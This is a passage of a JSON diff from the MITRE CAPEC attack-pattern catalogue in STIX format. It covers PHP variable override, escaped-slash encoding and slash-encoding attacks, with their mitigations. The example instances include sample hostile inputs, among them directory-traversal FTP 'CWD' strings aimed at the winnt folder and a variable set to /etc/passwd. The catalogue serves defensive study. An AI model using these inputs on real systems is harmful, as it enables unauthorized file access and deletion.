"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--33951a4d-6ab2-4bdb-854f-4f2794baa0aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7822e43d-f894-41ac-88d5-41b2c0b4ef6e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.", + "id": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--80063d3f-3b3f-4552-bbbe-499aabc86961", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d2b1d3bb-89ce-4615-be0c-c35eed6ad012", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.", + "external_references": [ + { + "external_id": "CAPEC-77", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-473", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Artur Maj, Securing PHP: Step-by-Step, 2003--06---22, Security Focus", + "external_id": "REF-520", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1706" + }, + { + "description": "Clancy Malcolm, Ten Security Checks for PHP, Part 1, 2003--03---20", + "external_id": "REF-521", + "source_name": "reference_from_CAPEC" + }, + { + "description": "PHP Manual, The PHP Group", + "external_id": "REF-522", + "source_name": "reference_from_CAPEC", + "url": "http://www.php.net/manual/en/security.globals.php" + } + ], + "id": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating User-Controlled Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a study in bad security. The main idea pervading PHP is \"ease of use,\" and the mantra \"don't make the developer go to any extra work to get stuff done\" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.\n One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.\n Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:\n while($count < 10){// Do something$count++;}\n Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as\n GET /login.php?count=9\n and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.\n Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an adversary can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.\n PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.\n Consider another example of this problem in which a program defines a variable called $tempfile. An adversary can supply a new temp file such as $tempfile = \"/etc/passwd\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.\n Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \"Trojaned\" (the adversary can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.\n Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.See also: File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on.

Experiment

  1. Find user-controlled variables: Using the information found by probing the application, the adversary attempts to manipulate many user-controlled variables and observes the effects on the application. If the adversary notices any significant changes to the application, they will know that a certain variable is useful to the application.

    2. Techniques
    Adversaries will try to alter many common variable names such as \"count\", \"tempFile\", \"i\", etc. The hope is that they can alter the flow of the application without knowing the inner-workings.
    Adversaries will try to alter known environment variables.

Exploit

  1. Manipulate user-controlled variables: Once the adversary has found a user-controller variable(s) that is important to the application, they will manipulate it to change the normal behavior in a way that benefits the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "attack-pattern--a506984b-0870-42d9-8bcd-0787f13b8c2e" + ], + "x_capec_prerequisites": [ + "A variable consumed by the application server is exposed to the client.", + "A variable consumed by the application server can be overwritten by the user.", + "The application server trusts user supplied data to compute business logic.", + "The application server does not perform proper input validation." + ], + "x_capec_skills_required": { + "Low": "The malicious user can easily try some well-known global variables and find one which matches.", + "Medium": "The adversary can use automated tools to probe for variables that they can control." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--593062e2-612e-46ce-8739-0d2b1b15f720", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.", + "id": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d6ce1ff-fa90-41cf-86a8-911f793e6838", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c40eaa0-2cde-4309-b3c3-79aebcc2ada3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use encapsulation when declaring your variables. This is to lower the exposure of your variables.", + "id": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3e969df-fa7a-479d-ba25-c6b31da5cffa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should be rejected by the program.", + "id": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6076ab-c2e1-428a-8d0f-b7f0642e9811", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.", + "external_references": [ + { + "external_id": "CAPEC-78", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Escaped Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:\n / yields /\\/ yields /\n ", + "\n An attack leveraging escaped slashes in slternate encodings is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts to escape multiple different special characters using a backslash.

    2. Techniques
    Escape a special character with a backslash to bypass input validation.
    Try different encodings of both the backslash and the special character to see if this bypasses input validation

Exploit

  1. Manipulate input: Once the adversary determines how to bypass filters that filter out special characters using an escaped slash, they will manipulate the user input in a way that is not intended by the application.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts the backlash character as escape character.", + "The application server does incomplete input data decoding, filtering and validation." + ], + "x_capec_skills_required": { + "Low": "The adversary can naively try backslash character and discover that the target host uses it as escape character.", + "Medium": "The adversary may need deep understanding of the host target in order to exploit the vulnerability. The adversary may also use automated tools to probe for this vulnerability." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that the user-supplied data does not use backslash character to escape malicious characters.", + "id": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cb4ae43-cf9a-40ac-a774-6c54684220cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18db8c39-5734-4976-995e-2b41058357e4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding.", + "id": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c87e3a8c-ff00-48c7-8fc7-287c0608ac1d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data.", + "id": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--91ab6a50-36a5-4861-85ce-aac5a6c7af09", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.", + "id": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12c4ce97-d297-42dc-a8bc-b477e5c4bffb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f3d2ae6-65d1-4164-a0e0-b2c4925961ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.", + "id": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--937e412f-6548-4f31-b652-45f3f5510579", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.", + "external_references": [ + { + "external_id": "CAPEC-79", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + } + ], + "id": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes in Alternate Encoding", + "object_marking_refs": [ + 